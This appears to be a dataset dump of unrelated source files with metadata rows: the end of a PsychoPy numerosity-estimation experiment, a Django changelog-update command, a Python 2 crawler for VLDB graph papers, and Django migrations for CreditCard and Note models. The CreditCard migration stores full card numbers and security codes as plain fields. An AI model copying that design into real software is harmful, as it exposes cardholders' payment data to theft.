    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED

# -------Start Routine "instr1"-------
while continueRoutine:
    # get current time
    t = instr1Clock.getTime()
    frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
    # Draw the three welcome/instruction lines and block until spacebar.
    # (typo 'esimation' in the original message fixed)
    message1 = visual.TextStim(win, pos=[0, +30], units='pix')
    message1.setText('Welcome to our experiment.')
    message2 = visual.TextStim(win, pos=[0, 0], units='pix')
    message2.setText('Please give your best estimation.')
    message3 = visual.TextStim(win, pos=[0, -30], units='pix')
    message3.setText('Hit spacebar to start practice.')
    message1.draw()
    message2.draw()
    message3.draw()
    win.flip()
    event.waitKeys(keyList=['space'])
    # check if all components have finished
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if at least one component still running
    for thisComponent in instr1Components:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break  # at least one component has not yet finished
    # check for quit (the Esc key)
    if endExpNow or event.getKeys(keyList=["escape"]):
        core.quit()
    # refresh the screen
    if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
        win.flip()

# -------Ending Routine "instr1"-------
for thisComponent in instr1Components:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
# the Routine "instr1" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
p_trials = data.TrialHandler(nReps=5, method='random',
                             extraInfo=expInfo, originPath=-1,
                             trialList=[None],
                             seed=None, name='p_trials')
thisExp.addLoop(p_trials)  # add the loop to the experiment
thisP_trial = p_trials.trialList[0]  # so we can initialise stimuli with some values
# abbreviate parameter names if possible (no-op here: trialList is [None])
if thisP_trial is not None:
    for paramName in thisP_trial.keys():
        exec(paramName + '= thisP_trial.' + paramName)

for thisP_trial in p_trials:
    currentLoop = p_trials
    # abbreviate parameter names if possible (e.g. rgb = thisP_trial.rgb)
    if thisP_trial is not None:
        for paramName in thisP_trial.keys():
            exec(paramName + '= thisP_trial.' + paramName)

    # ------Prepare to start Routine "fixation"-------
    t = 0
    fixationClock.reset()  # clock
    frameN = -1
    continueRoutine = True
    fixationComponents = []  # routine is drawn in code below; no Builder components
    for thisComponent in fixationComponents:
        if hasattr(thisComponent, 'status'):
            thisComponent.status = NOT_STARTED

    # -------Start Routine "fixation"-------
    while continueRoutine:
        t = fixationClock.getTime()
        frameN = frameN + 1  # number of completed frames
        # central '+'; participant starts the practice display with spacebar
        fixation = visual.TextStim(win, color=(-1, -1, -1), bold=True, units='pix')
        fixation.setText('+')
        fixation.draw()
        win.flip()
        event.waitKeys(keyList=['space'])
        if not continueRoutine:  # a component has requested a forced-end of Routine
            break
        continueRoutine = False  # will revert to True if a component is still running
        for thisComponent in fixationComponents:
            if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                continueRoutine = True
                break
        # check for quit (the Esc key)
        if endExpNow or event.getKeys(keyList=["escape"]):
            core.quit()
        if continueRoutine:
            win.flip()

    # -------Ending Routine "fixation"-------
    for thisComponent in fixationComponents:
        if hasattr(thisComponent, "setAutoDraw"):
            thisComponent.setAutoDraw(False)
    # the Routine "fixation" was not non-slip safe, so reset the non-slip timer
    routineTimer.reset()

    # ------Prepare to start Routine "practice"-------
    t = 0
    practiceClock.reset()  # clock
    frameN = -1
    continueRoutine = True
    # the same practice image is used for every practice trial
    p_img.setImage(u'2_c_2_f_100_wS_0.4_eS_0.15811388300841897_0.15811388300841897_33.png')
    key_resp_2 = event.BuilderKeyResponse()
    practiceComponents = [p_img, key_resp_2]
    for thisComponent in practiceComponents:
        if hasattr(thisComponent, 'status'):
            thisComponent.status = NOT_STARTED

    # -------Start Routine "practice"-------
    while continueRoutine:
        t = practiceClock.getTime()
        frameN = frameN + 1  # number of completed frames
        # *p_img* updates: image shown from t=0 for ~0.15 s
        if t >= 0.0 and p_img.status == NOT_STARTED:
            p_img.tStart = t
            p_img.frameNStart = frameN  # exact frame index
            p_img.setAutoDraw(True)
        frameRemains = 0.0 + 0.15 - win.monitorFramePeriod * 0.75  # most of one frame period left
        if p_img.status == STARTED and t >= frameRemains:
            p_img.setAutoDraw(False)
        # *key_resp_2* updates: typed-number response opens once the image is gone
        if t >= 0.15 and key_resp_2.status == NOT_STARTED:
            key_resp_2.tStart = t
            key_resp_2.frameNStart = frameN
            key_resp_2.status = STARTED
            win.callOnFlip(key_resp_2.clock.reset)  # t=0 on next screen flip
            event.clearEvents(eventType='keyboard')
        if key_resp_2.status == STARTED:
            ptext = visual.TextStim(win, pos=[0, 0])
            # digits (top row and numpad) plus return/backspace for editing
            theseKeysP = event.getKeys(keyList=[
                '1', '2', '3', '4', '5', '6', '7', '8', '9', '0',
                'return', 'backspace',
                'num_1', 'num_2', 'num_3', 'num_4', 'num_5',
                'num_6', 'num_7', 'num_8', 'num_9', 'num_0'])
            # (the original also tested for "escape" in theseKeysP, but 'escape'
            # is not in the keyList above so that branch could never fire; Esc
            # is handled by the routine-level check below)
            if len(theseKeysP) > 0:  # at least one key was pressed
                if "backspace" in theseKeysP:
                    key_resp_2.keys = key_resp_2.keys[:-1]
                key_resp_2.keys.extend([key for key in theseKeysP
                                        if key != "return" and key != "backspace"])
                # normalise numpad key names ('num_3') to plain digits ('3')
                key_resp_2.keys = [k[-1] if k.startswith('num_') else k
                                   for k in key_resp_2.keys]
                # echo the typed number back to the participant
                key_str2 = "".join(key_resp_2.keys)
                ptext.setText(key_str2)
                ptext.draw()
                win.flip()
                core.wait(0.5)
                if len(key_str2) != 0:
                    key_num2 = int(key_str2)  # numeric value of the response
                if "return" in theseKeysP:
                    # record RT at confirmation, as the main trial routine does
                    # (the original never set key_resp_2.rt, yet logged it below)
                    key_resp_2.rt = key_resp_2.clock.getTime()
                    continueRoutine = False
        if not continueRoutine:  # a component has requested a forced-end of Routine
            break
        continueRoutine = False  # will revert to True if a component is still running
        for thisComponent in practiceComponents:
            if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                continueRoutine = True
                break
        # check for quit (the Esc key)
        if endExpNow or event.getKeys(keyList=["escape"]):
            core.quit()
        if continueRoutine:
            win.flip()

    # -------Ending Routine "practice"-------
    for thisComponent in practiceComponents:
        if hasattr(thisComponent, "setAutoDraw"):
            thisComponent.setAutoDraw(False)
    # check responses
    if key_resp_2.keys in ['', [], None]:  # no response was made
        key_resp_2.keys = None
    p_trials.addData('key_resp_2.keys', key_resp_2.keys)
    if key_resp_2.keys is not None:  # we had a response
        p_trials.addData('key_resp_2.rt', key_resp_2.rt)
    # the Routine "practice" was not non-slip safe, so reset the non-slip timer
    routineTimer.reset()
    thisExp.nextEntry()
# completed 5 repeats of 'p_trials'
# ------Prepare to start Routine "endP"-------
t = 0
endPClock.reset()  # clock
frameN = -1
continueRoutine = True
endPComponents = []  # routine is drawn in code below; no Builder components
for thisComponent in endPComponents:
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED

# -------Start Routine "endP"-------
while continueRoutine:
    t = endPClock.getTime()
    frameN = frameN + 1  # number of completed frames
    # announce the end of practice and wait for spacebar
    end_practice1 = visual.TextStim(win, pos=[0, +35], units='pix')
    end_practice1.setText('This is the end of practice')
    end_practice2 = visual.TextStim(win, pos=[0, 0], units='pix')
    end_practice2.setText('There are 10 blocks of the real experiment, you will see 3 reference images before each block.')
    end_practice3 = visual.TextStim(win, pos=[0, -35], units='pix')
    end_practice3.setText('Hit spacebar to start the real experiment.')
    end_practice1.draw()
    end_practice2.draw()
    end_practice3.draw()
    win.flip()
    event.waitKeys(keyList=['space'])
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if a component is still running
    for thisComponent in endPComponents:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break
    # check for quit (the Esc key)
    if endExpNow or event.getKeys(keyList=["escape"]):
        core.quit()
    if continueRoutine:
        win.flip()

# -------Ending Routine "endP"-------
for thisComponent in endPComponents:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
# the Routine "endP" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
blocks = data.TrialHandler(nReps=1, method='sequential',
                           extraInfo=expInfo, originPath=-1,
                           trialList=data.importConditions("blockOrder" + expInfo['blockOrder'] + ".csv"),
                           seed=None, name='blocks')
thisExp.addLoop(blocks)  # add the loop to the experiment
thisBlock = blocks.trialList[0]  # so we can initialise stimuli with some values
# abbreviate parameter names: the CSV supplies at least ref_image1..3,
# Number1..3 and winsize, which are used below (confirm against the CSV)
if thisBlock is not None:
    for paramName in thisBlock.keys():
        exec(paramName + '= thisBlock.' + paramName)

for thisBlock in blocks:
    currentLoop = blocks
    # abbreviate parameter names if possible (e.g. rgb = thisBlock.rgb)
    if thisBlock is not None:
        for paramName in thisBlock.keys():
            exec(paramName + '= thisBlock.' + paramName)

    # ------Prepare to start Routine "instr2"-------
    t = 0
    instr2Clock.reset()  # clock
    frameN = -1
    continueRoutine = True
    instr2Components = []  # routine is drawn in code below; no Builder components
    for thisComponent in instr2Components:
        if hasattr(thisComponent, 'status'):
            thisComponent.status = NOT_STARTED

    # -------Start Routine "instr2"-------
    # Shows the three reference displays for this block, each preceded by a
    # fixation cross and followed by its true disk count.
    while continueRoutine:
        t = instr2Clock.getTime()
        frameN = frameN + 1  # number of completed frames
        fix = visual.TextStim(win, pos=[0, 0], bold=True, units='pix')
        block_text = visual.TextStim(win, pos=[0, 0], units='pix')
        block_text.setText('Fixate to the center of screen and press spacebar to see the reference display.')
        block_text.draw()
        win.flip()
        event.waitKeys(keyList=['space'])
        fix.setText('+')
        fix.setColor(u'black')
        fix.draw()
        win.flip()
        event.waitKeys(keyList=['space'])
        # --- reference display 1 ---
        image_ref = visual.ImageStim(win, image=ref_image1, units='pix')
        image_ref.draw()
        win.flip()
        core.wait(0.15)
        image_ref_text = visual.TextStim(win, pos=[0, 15], units='pix')
        image_ref_text2 = visual.TextStim(win, pos=[0, -15], units='pix')
        image_ref_text3 = visual.TextStim(win, pos=[0, 0], units='pix')
        image_ref_text.setText('The number of the reference disks is %s:' % (int(Number1)))
        image_ref_text2.setText('Press C to continue')
        image_ref_text.draw()
        image_ref_text2.draw()
        win.flip()
        event.waitKeys(keyList=['c'])
        image_ref_text3.setText('Fixate to the center and press spacebar to see another reference display.')
        image_ref_text3.draw()
        win.flip()
        event.waitKeys(keyList=['space'])
        fix.draw()
        win.flip()
        event.waitKeys(keyList=['space'])
        # --- reference display 2 ---
        image_ref2 = visual.ImageStim(win, image=ref_image2, units='pix')
        # BUG FIX: the original called image_ref.draw() here, so the second
        # reference display was never actually shown.
        image_ref2.draw()
        win.flip()
        core.wait(0.15)
        image_ref_text.setText('The number of the reference disks is %s:' % (int(Number2)))
        image_ref_text.draw()
        image_ref_text2.draw()
        win.flip()
        event.waitKeys(keyList=['c'])
        image_ref_text3.draw()
        win.flip()
        event.waitKeys(keyList=['space'])
        fix.draw()
        win.flip()
        event.waitKeys(keyList=['space'])
        # --- reference display 3 ---
        image_ref3 = visual.ImageStim(win, image=ref_image3, units='pix')
        image_ref3.draw()
        win.flip()
        core.wait(0.15)
        image_ref_text.setText('The number of the reference disks is %s:' % (int(Number3)))
        image_ref_text.draw()
        image_ref_text2.draw()
        win.flip()
        event.waitKeys(keyList=['c'])
        image_ref_text3.setText('Press spacebar to start the real experiment.')
        image_ref_text3.draw()
        win.flip()
        event.waitKeys(keyList=['space'])
        if not continueRoutine:  # a component has requested a forced-end of Routine
            break
        continueRoutine = False  # will revert to True if a component is still running
        for thisComponent in instr2Components:
            if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                continueRoutine = True
                break
        # check for quit (the Esc key)
        if endExpNow or event.getKeys(keyList=["escape"]):
            core.quit()
        if continueRoutine:
            win.flip()

    # -------Ending Routine "instr2"-------
    for thisComponent in instr2Components:
        if hasattr(thisComponent, "setAutoDraw"):
            thisComponent.setAutoDraw(False)
    # the Routine "instr2" was not non-slip safe, so reset the non-slip timer
    routineTimer.reset()

    # set up handler for this block's trials; 'winsize' (a conditions-file
    # path, from the blockOrder CSV) selects the trial list
    trials = data.TrialHandler(nReps=1, method='random',
                               extraInfo=expInfo, originPath=-1,
                               trialList=data.importConditions(winsize),
                               seed=None, name='trials')
    thisExp.addLoop(trials)  # add the loop to the experiment
    thisTrial = trials.trialList[0]  # so we can initialise stimuli with some values
    if thisTrial is not None:
        for paramName in thisTrial.keys():
            exec(paramName + '= thisTrial.' + paramName)

    for thisTrial in trials:
        currentLoop = trials
        # abbreviate parameter names (e.g. imageFile comes from the conditions file)
        if thisTrial is not None:
            for paramName in thisTrial.keys():
                exec(paramName + '= thisTrial.' + paramName)

        # ------Prepare to start Routine "fixation"-------
        t = 0
        fixationClock.reset()  # clock
        frameN = -1
        continueRoutine = True
        fixationComponents = []  # routine is drawn in code below
        for thisComponent in fixationComponents:
            if hasattr(thisComponent, 'status'):
                thisComponent.status = NOT_STARTED

        # -------Start Routine "fixation"-------
        while continueRoutine:
            t = fixationClock.getTime()
            frameN = frameN + 1  # number of completed frames
            # central '+'; participant starts the trial display with spacebar
            fixation = visual.TextStim(win, color=(-1, -1, -1), bold=True, units='pix')
            fixation.setText('+')
            fixation.draw()
            win.flip()
            event.waitKeys(keyList=['space'])
            if not continueRoutine:
                break
            continueRoutine = False
            for thisComponent in fixationComponents:
                if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                    continueRoutine = True
                    break
            if endExpNow or event.getKeys(keyList=["escape"]):
                core.quit()
            if continueRoutine:
                win.flip()

        # -------Ending Routine "fixation"-------
        for thisComponent in fixationComponents:
            if hasattr(thisComponent, "setAutoDraw"):
                thisComponent.setAutoDraw(False)
        routineTimer.reset()

        # ------Prepare to start Routine "trial"-------
        t = 0
        trialClock.reset()  # clock
        frameN = -1
        continueRoutine = True
        image.setImage(imageFile)
        key_resp_3 = event.BuilderKeyResponse()
        trialComponents = [image, key_resp_3]
        for thisComponent in trialComponents:
            if hasattr(thisComponent, 'status'):
                thisComponent.status = NOT_STARTED

        # -------Start Routine "trial"-------
        while continueRoutine:
            t = trialClock.getTime()
            frameN = frameN + 1  # number of completed frames
            # *image* updates: stimulus shown from t=0 for ~0.15 s
            if t >= 0.0 and image.status == NOT_STARTED:
                image.tStart = t
                image.frameNStart = frameN  # exact frame index
                image.setAutoDraw(True)
            frameRemains = 0.0 + 0.15 - win.monitorFramePeriod * 0.75  # most of one frame period left
            if image.status == STARTED and t >= frameRemains:
                image.setAutoDraw(False)
            # *key_resp_3* updates: typed-number response opens once the image is gone
            if t >= 0.15 and key_resp_3.status == NOT_STARTED:
                key_resp_3.tStart = t
                key_resp_3.frameNStart = frameN
                key_resp_3.status = STARTED
                win.callOnFlip(key_resp_3.clock.reset)  # t=0 on next screen flip
                event.clearEvents(eventType='keyboard')
            if key_resp_3.status == STARTED:
                Atext = visual.TextStim(win)
                theseKeys = event.getKeys(keyList=[
                    '1', '2', '3', '4', '5', '6', '7', '8', '9', '0',
                    'return', 'backspace',
                    'num_1', 'num_2', 'num_3', 'num_4', 'num_5',
                    'num_6', 'num_7', 'num_8', 'num_9', 'num_0'])
                # (the original also tested for "escape" in theseKeys, but
                # 'escape' is not in the keyList above so that branch could
                # never fire; Esc is handled by the routine-level check below)
                if len(theseKeys) > 0:  # at least one key was pressed
                    if "backspace" in theseKeys:
                        key_resp_3.keys = key_resp_3.keys[:-1]
                    key_resp_3.keys.extend([key for key in theseKeys
                                            if key != "return" and key != "backspace"])
                    # normalise numpad key names ('num_3') to plain digits ('3')
                    key_resp_3.keys = [k[-1] if k.startswith('num_') else k
                                       for k in key_resp_3.keys]
                    # echo the typed number back to the participant
                    key_str = "".join(key_resp_3.keys)
                    Atext.setText(key_str)
                    Atext.draw()
                    win.flip()
                    core.wait(0.5)
                    if len(key_str) != 0:
                        key_num = int(key_str)  # numeric value of the response
                    if "return" in theseKeys:
                        key_resp_3.rt = key_resp_3.clock.getTime()
                        Atext.setText('')
                        Atext.draw()
                        core.wait(0.5)
                        continueRoutine = False
            if not continueRoutine:  # a component has requested a forced-end of Routine
                break
            continueRoutine = False  # will revert to True if a component is still running
            for thisComponent in trialComponents:
                if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                    continueRoutine = True
                    break
            # check for quit (the Esc key)
            if endExpNow or event.getKeys(keyList=["escape"]):
                core.quit()
            if continueRoutine:
                win.flip()

        # -------Ending Routine "trial"-------
        for thisComponent in trialComponents:
            if hasattr(thisComponent, "setAutoDraw"):
                thisComponent.setAutoDraw(False)
        # check responses
        if key_resp_3.keys in ['', [], None]:  # no response was made
            key_resp_3.keys = None
        # BUG FIX: the original logged key_num here, which is undefined until
        # the first non-empty response and otherwise carries the previous
        # trial's value; log the keys themselves, as the practice loop does.
        trials.addData('key_resp_3.keys', key_resp_3.keys)
        if key_resp_3.keys is not None:  # we had a response
            trials.addData('key_resp_3.rt', key_resp_3.rt)
        routineTimer.reset()

        # ------Prepare to start Routine "break_3"-------
        t = 0
        break_3Clock.reset()  # clock
        frameN = -1
        continueRoutine = True
        # show the break screen only after trial index 24
        if trials.thisN != 24:  # TODO
            continueRoutine = False
        break_3Components = []
        for thisComponent in break_3Components:
            if hasattr(thisComponent, 'status'):
                thisComponent.status = NOT_STARTED

        # -------Start Routine "break_3"-------
        while continueRoutine:
            t = break_3Clock.getTime()
            frameN = frameN + 1  # number of completed frames
            break_text2 = visual.TextStim(win, text='Take a short break. Press spacebar to continue.', pos=[0, 0], units='pix')
            break_text2.draw()
            win.flip()
            event.waitKeys(keyList=['space'])
            if not continueRoutine:
                break
            continueRoutine = False
            for thisComponent in break_3Components:
                if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                    continueRoutine = True
                    break
            if endExpNow or event.getKeys(keyList=["escape"]):
                core.quit()
            if continueRoutine:
                win.flip()

        # -------Ending Routine "break_3"-------
        for thisComponent in break_3Components:
            if hasattr(thisComponent, "setAutoDraw"):
                thisComponent.setAutoDraw(False)
        routineTimer.reset()
        thisExp.nextEntry()
    # completed 1 repeats of 'trials'
    thisExp.nextEntry()
# completed 1 repeats of 'blocks'
# ------Prepare to start Routine "thanks"-------
t = 0
thanksClock.reset()  # clock
frameN = -1
continueRoutine = True
thanksComponents = []  # routine is drawn in code below; no Builder components
for thisComponent in thanksComponents:
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED

# -------Start Routine "thanks"-------
while continueRoutine:
    t = thanksClock.getTime()
    frameN = frameN + 1  # number of completed frames
    thankmesg1 = visual.TextStim(win, pos=[0, +35], units='pix')
    thankmesg1.setText('This is the end of the experiment.')
    thankmesg2 = visual.TextStim(win, pos=[0, 0], units='pix')
    thankmesg2.setText('Thank you for your participation.')
    thankmesg1.draw()
    thankmesg2.draw()
    win.flip()
    # NOTE(review): this screen is dismissed with 'n', not spacebar --
    # presumably deliberate (experimenter-only key); confirm.
    event.waitKeys(keyList=['n'])
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if a component is still running
    for thisComponent in thanksComponents:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break
    # check for quit (the Esc key)
    if endExpNow or event.getKeys(keyList=["escape"]):
        core.quit()
    if continueRoutine:
        win.flip()

# -------Ending Routine "thanks"-------
for thisComponent in thanksComponents:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
# the Routine "thanks" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()

# these shouldn't be strictly necessary (should auto-save)
thisExp.saveAsWideText(filename + '.csv')
thisExp.saveAsPickle(filename)
logging.flush()
# make sure everything is closed down
thisExp.abort()  # or data files will save again on exit
win.close()
core.quit()
| 40.463974 | 211 | 0.595225 | 4,374 | 37,065 | 4.962963 | 0.130087 | 0.021605 | 0.013267 | 0.011609 | 0.742445 | 0.706652 | 0.672517 | 0.644325 | 0.61019 | 0.548738 | 0 | 0.021642 | 0.301875 | 37,065 | 915 | 212 | 40.508197 | 0.817282 | 0.298314 | 0 | 0.588034 | 0 | 0 | 0.076866 | 0.005751 | 0 | 0 | 0 | 0.001093 | 0 | 1 | 0 | false | 0 | 0.017094 | 0 | 0.017094 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af500d453fe91b9945968c258744e395d10c0060 | 477 | py | Python | allmychanges/management/commands/update_package.py | AllMyChanges/allmychanges.com | 6729e9bddee8f76068737383d641ca3bc6e85422 | [
"BSD-2-Clause"
] | 46 | 2015-01-31T10:19:26.000Z | 2019-07-01T14:00:01.000Z | allmychanges/management/commands/update_package.py | AllMyChanges/allmychanges.com | 6729e9bddee8f76068737383d641ca3bc6e85422 | [
"BSD-2-Clause"
] | 59 | 2015-02-27T12:01:22.000Z | 2021-06-10T23:01:10.000Z | allmychanges/management/commands/update_package.py | AllMyChanges/allmychanges.com | 6729e9bddee8f76068737383d641ca3bc6e85422 | [
"BSD-2-Clause"
] | 11 | 2015-02-22T19:55:13.000Z | 2020-06-05T18:20:03.000Z | from django.core.management.base import BaseCommand
from twiggy_goodies.django import LogMixin
from allmychanges.models import Changelog
# Django management command: triggers a synchronous update of one Changelog,
# selected by name from the command-line arguments.
# NOTE(review): the keyword argument `async=...` became a reserved word in
# Python 3.7+; this code is Python-2 era and would need renaming to run there.
class Command(LogMixin, BaseCommand):
help = u"""Tests crawler on selected projects."""
def handle(self, *args, **options):
name = args[0]
changelog = Changelog.objects.filter(name=name)[0]
changelog.schedule_update(async=False,
full=len(args) > 1 and args[1] == 'full')
| 34.071429 | 75 | 0.66457 | 57 | 477 | 5.526316 | 0.684211 | 0.063492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01087 | 0.228512 | 477 | 13 | 76 | 36.692308 | 0.845109 | 0 | 0 | 0 | 0 | 0 | 0.081761 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.3 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af5c49dd9107b197cbc087d8323c96cc2f598371 | 1,791 | py | Python | study/third_party_library/crawler/FindInterestedPaperVLDB2014.py | CheYulin/PythonStudy | 2b68a9cb2f7044d7e5ce9e7c971070eba7a36c07 | [
"MIT"
] | 3 | 2018-03-10T15:14:06.000Z | 2020-06-17T03:13:21.000Z | study/third_party_library/crawler/FindInterestedPaperVLDB2014.py | YcheLanguageStudio/PythonStudy | 2b68a9cb2f7044d7e5ce9e7c971070eba7a36c07 | [
"MIT"
] | null | null | null | study/third_party_library/crawler/FindInterestedPaperVLDB2014.py | YcheLanguageStudio/PythonStudy | 2b68a9cb2f7044d7e5ce9e7c971070eba7a36c07 | [
"MIT"
] | null | null | null | import urllib2
import gzip
import re
import sys
from StringIO import StringIO
from bs4 import BeautifulSoup
__author__ = 'cheyulin'
def loadData(url):
request = urllib2.Request(url)
request.add_header('Accept-encoding', 'gzip')
response = urllib2.urlopen(request)
print response.info().get('Content-Encoding')
if response.info().get('Content-Encoding') == 'gzip':
print 'response data is in gzip format.'
buf = StringIO(response.read())
f = gzip.GzipFile(fileobj=buf)
data = f.read()
else:
data = response.read()
return data
if __name__ == '__main__':
reload(sys)
i = 0;
sys.setdefaultencoding('utf-8')
path = r'/home/cheyulin/Documents/Paper/GraphInDB/vldb2013/'
page = loadData('http://www.vldb.org/pvldb/vol6.html')
# path = r'/home/cheyulin/Documents/Paper/GraphInDB/vldb2014/'
# page = loadData('http://www.vldb.org/pvldb/vol7.html')
# path = r'/home/cheyulin/Documents/Paper/GraphInDB/vldb2016/'
# page = loadData('http://www.vldb.org/pvldb/vol9.html')
soup = BeautifulSoup(page, from_encoding='utf-8')
paper_info = soup.find_all('a');
for paper in paper_info:
if re.match(r'.*http.*pdf.*', str(paper)):
paper_file_name = str(paper.string).strip().replace(' ', '_') + '.pdf'
if re.match('.*[Gg]raph.*', paper_file_name):
i += 1
paper_url = paper['href']
print "hi:" + str(paper).split('</a>')[0].split(' ')[2].strip()
print paper_file_name
print str(paper_url).strip()
f = urllib2.urlopen(paper_url)
with open(path + paper_file_name, 'wb') as output_stream:
output_stream.write(f.read())
print i
| 35.117647 | 82 | 0.606924 | 225 | 1,791 | 4.693333 | 0.4 | 0.030303 | 0.049242 | 0.048295 | 0.266098 | 0.20928 | 0.20928 | 0.083333 | 0 | 0 | 0 | 0.01909 | 0.239531 | 1,791 | 50 | 83 | 35.82 | 0.756241 | 0.128978 | 0 | 0 | 0 | 0 | 0.156913 | 0.032154 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.146341 | null | null | 0.146341 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af65e71e39ab34772c4075a9651096d9ecc33326 | 1,275 | py | Python | bookStore/users/migrations/0022_creditcard.py | afern247/BookStore-Web | bb914f9344ba7a92252973633da99a6b09054217 | [
"MIT"
] | null | null | null | bookStore/users/migrations/0022_creditcard.py | afern247/BookStore-Web | bb914f9344ba7a92252973633da99a6b09054217 | [
"MIT"
] | null | null | null | bookStore/users/migrations/0022_creditcard.py | afern247/BookStore-Web | bb914f9344ba7a92252973633da99a6b09054217 | [
"MIT"
] | null | null | null | # Generated by Django 2.1.5 on 2019-03-23 22:30
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: creates the CreditCard model in the users app."""

    dependencies = [
        ('users', '0021_address_primaryaddress'),
    ]

    operations = [
        migrations.CreateModel(
            name='CreditCard',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                # Card number kept as a string; uniqueness enforced at DB level.
                ('number', models.CharField(max_length=16, unique=True)),
                ('expdate_month', models.IntegerField(choices=[(1, 'January'), (2, 'February'), (3, 'March'), (4, 'April'), (5, 'May'), (6, 'June'), (7, 'July'), (8, 'August'), (9, 'September'), (10, 'October'), (11, 'November'), (12, 'December')], default=1)),
                ('expdate_year', models.IntegerField(choices=[(2019, 2019), (2020, 2020), (2021, 2021), (2022, 2022), (2023, 2023), (2024, 2024), (2025, 2025), (2026, 2026), (2027, 2027), (2028, 2028)], default=2019)),
                ('securitycode', models.IntegerField()),
                # Deleting the owning Profile cascades and removes its cards.
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Profile')),
            ],
        ),
    ]
| 47.222222 | 261 | 0.580392 | 140 | 1,275 | 5.214286 | 0.642857 | 0.032877 | 0.038356 | 0.060274 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125633 | 0.225882 | 1,275 | 26 | 262 | 49.038462 | 0.613982 | 0.035294 | 0 | 0 | 1 | 0 | 0.149837 | 0.021987 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af694b73320e901f5929646929786a4800a51497 | 529 | py | Python | sw/migrations/0003_note.py | Nigar-mr/SwTechnices | a77835a0a5fa72f5cc76e1ef6c004173b10c03bc | [
"MIT"
] | null | null | null | sw/migrations/0003_note.py | Nigar-mr/SwTechnices | a77835a0a5fa72f5cc76e1ef6c004173b10c03bc | [
"MIT"
] | null | null | null | sw/migrations/0003_note.py | Nigar-mr/SwTechnices | a77835a0a5fa72f5cc76e1ef6c004173b10c03bc | [
"MIT"
] | null | null | null | # Generated by Django 2.2.7 on 2019-11-22 08:33
import ckeditor.fields
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: creates the Note model in the sw app."""

    dependencies = [
        ('sw', '0002_message_occupation'),
    ]

    operations = [
        migrations.CreateModel(
            name='Note',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Rich-text note body provided by django-ckeditor.
                ('note', ckeditor.fields.RichTextField()),
            ],
        ),
    ]
